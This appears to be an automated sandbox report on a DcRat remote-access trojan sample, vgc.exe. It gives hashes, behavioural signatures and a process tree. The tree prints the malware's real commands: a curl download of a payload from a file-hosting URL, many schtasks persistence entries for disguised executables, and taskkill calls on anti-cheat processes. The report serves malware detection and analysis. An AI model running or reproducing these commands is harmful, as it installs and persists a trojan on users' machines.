Analysis
-
max time kernel
32s -
max time network
34s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
07-12-2024 03:41
Static task
static1
Behavioral task
behavioral1
Sample
vgc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
vgc.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
vgc.exe
Resource
win11-20241007-en
General
-
Target
vgc.exe
-
Size
56KB
-
MD5
6b66076ea9dd9855bb6f8592f3778299
-
SHA1
0851a6843651c4a890f5417eede54c76bb2357b2
-
SHA256
fa2b6e2595af4fd8b7e4cedc88daf254d829132be6cb5e51fd4dbce8323f1665
-
SHA512
0dc87c60fc6c0106fb79344de207a0b17ef3c46cef0ad8035cb3fc91393c1167b0189c6ae80114b938b227136ea62b9f08be756a81846d4303d7bfd81e8db1b4
-
SSDEEP
768:T/lUHY89mrZe0xBz71sGRQGsUfzG27YNkTjq7FUMHJH:T/loM71RQGsuzZFnq7FUm
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2516 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1076 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3556 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1040 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5044 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3844 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3912 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5000 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1212 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2200 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 540 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1672 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 2972 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 2972 schtasks.exe 88 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 392 physmeme.exe 3988 Winver.exe 720 vgc.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Photo Viewer\it-IT\55b276f4edf653 Winver.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe Winver.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\088424020bedd6 Winver.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe Winver.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dccf08edf42708 Winver.exe File created C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe Winver.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe File created C:\Windows\Provisioning\vgc.exe Winver.exe File created C:\Windows\Provisioning\114b3435779e0d Winver.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4852 PING.EXE -
Kills process with taskkill 2 IoCs
pid Process 3256 taskkill.exe 3260 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings Winver.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4852 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4496 schtasks.exe 2200 schtasks.exe 540 schtasks.exe 1672 schtasks.exe 2516 schtasks.exe 1076 schtasks.exe 3048 schtasks.exe 5020 schtasks.exe 2324 schtasks.exe 3844 schtasks.exe 3912 schtasks.exe 2264 schtasks.exe 5044 schtasks.exe 5000 schtasks.exe 1212 schtasks.exe 1700 schtasks.exe 3556 schtasks.exe 1040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 3988 Winver.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe 720 vgc.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2760 vgc.exe Token: SeDebugPrivilege 3988 Winver.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 3260 taskkill.exe Token: SeDebugPrivilege 720 vgc.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2760 wrote to memory of 3600 2760 vgc.exe 78 PID 2760 wrote to memory of 3600 2760 vgc.exe 78 PID 2760 wrote to memory of 2828 2760 vgc.exe 79 PID 2760 wrote to memory of 2828 2760 vgc.exe 79 PID 2828 wrote to memory of 4924 2828 cmd.exe 80 PID 2828 wrote to memory of 4924 2828 cmd.exe 80 PID 2760 wrote to memory of 392 2760 vgc.exe 81 PID 2760 wrote to memory of 392 2760 vgc.exe 81 PID 2760 wrote to memory of 392 2760 vgc.exe 81 PID 392 wrote to memory of 5108 392 physmeme.exe 82 PID 392 wrote to memory of 5108 392 physmeme.exe 82 PID 392 wrote to memory of 5108 392 physmeme.exe 82 PID 5108 wrote to memory of 3468 5108 WScript.exe 83 PID 5108 wrote to memory of 3468 5108 WScript.exe 83 PID 5108 wrote to memory of 3468 5108 WScript.exe 83 PID 3468 wrote to memory of 3988 3468 cmd.exe 85 PID 3468 wrote to memory of 3988 3468 cmd.exe 85 PID 2760 wrote to memory of 3908 2760 vgc.exe 86 PID 2760 wrote to memory of 3908 2760 vgc.exe 86 PID 3908 wrote to memory of 3256 3908 cmd.exe 87 PID 3908 wrote to memory of 3256 3908 cmd.exe 87 PID 2760 wrote to memory of 1884 2760 vgc.exe 89 PID 2760 wrote to memory of 1884 2760 vgc.exe 89 PID 1884 wrote to memory of 3260 1884 cmd.exe 90 PID 1884 wrote to memory of 3260 1884 cmd.exe 90 PID 3988 wrote to memory of 4768 3988 Winver.exe 109 PID 3988 wrote to memory of 4768 3988 Winver.exe 109 PID 4768 wrote to memory of 3856 4768 cmd.exe 111 PID 4768 wrote to memory of 3856 4768 cmd.exe 111 PID 4768 wrote to memory of 4852 4768 cmd.exe 112 PID 4768 wrote to memory of 4852 4768 cmd.exe 112 PID 4768 wrote to memory of 720 4768 cmd.exe 113 PID 4768 wrote to memory of 720 4768 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vgc.exe"C:\Users\Admin\AppData\Local\Temp\vgc.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4924
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\ESD\Winver.exe"C:\ESD/Winver.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HgPKhHR7vT.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:3856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4852
-
-
C:\Windows\Provisioning\vgc.exe"C:\Windows\Provisioning\vgc.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgtray.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgtray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\vgc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgc" /sc ONLOGON /tr "'C:\Windows\Provisioning\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 10 /tr "'C:\Windows\Provisioning\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\vgc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vgcv" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\vgc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 9 /tr "'C:\ESD\Winver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 8 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2200
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD58decf43a92645d8ba4b81696c5e7b1ae
SHA1dcc9ca8b24e3adf7568eb0f6b7f5cd27f039faf6
SHA2566ad34bd4e803fad802052423aeab64f4c60dd3ee55a3167425b9640ae24bfea1
SHA51272e44773f484d2e69ebd41cc555d9a57c833b3930e1f3b0326c90882035e0dc5fb54e8d4ded22cf9f2d28fb502b37b133b7c1c9f9d89b8c21857b569c51ebc17
-
Filesize
1.8MB
MD5d9ce1032fee5365065a78bbff7267883
SHA14c7471b47d4151908dd204303421d7c64cf4c5c6
SHA25665d26e7c0b856832e88efefe5c2a9e767fb2a7345715bbd0a6e10f9ac2afb520
SHA5120455364fa91c07da6fecbfb3e3fdbbbcb909e3176b5b151e3653f8b8ebffc02e14fb3471245df479b83f90cd2e1142bcff82b80555cfb3df113696b2925d9435
-
Filesize
57B
MD5d1a4f1e326e7dfca62327ea69446dc7c
SHA1253e264c90cbd15836d8c3a1eab3c26756d94047
SHA256ea091556a5dbab314a6029817a9db64f9b8adc7afb476bbbb11aec0c227f0de2
SHA5123d4624c169297b50329a4e13f3f559a7a1f02112f6482e45cfba747dad11c6e6642f1411cec5e92d7890f86fb38702f48c75fec4d24332d43484ad7b9dbf29c8
-
Filesize
159B
MD54915fb4f7db6b722e340a09a465a64f5
SHA1ace7e51ab4842d02e3bf0c7559d09a4e81fa21ae
SHA25658d7dbdeb005e1e1acc270d80912c3c3d62b0c1012d9769da8a4e14642755158
SHA512d5ad1f43c933b1424dd0c4590693a7684bf45ecc3cea77622ecba05163246f2328d4321bff264097e37c9e459aab57b52e1b6b108f187bcd55fde6683ad62709
-
Filesize
2.1MB
MD56261ec3f13e1cc6ae25ee8942db137b0
SHA120629ed3f752869dc4980827291bf3064333405f
SHA256a6429d9778a93254c7387cf588619a2635ed97108558a122de885aad25a57eb7
SHA512ed292a77db5e9926cbaa247e449a4019776b2452d2e8cdadfcea4c3d7551372793b2a1125b44cfd5106d2b03ff178041d413750ee81bfc42d7a3252a934b51f1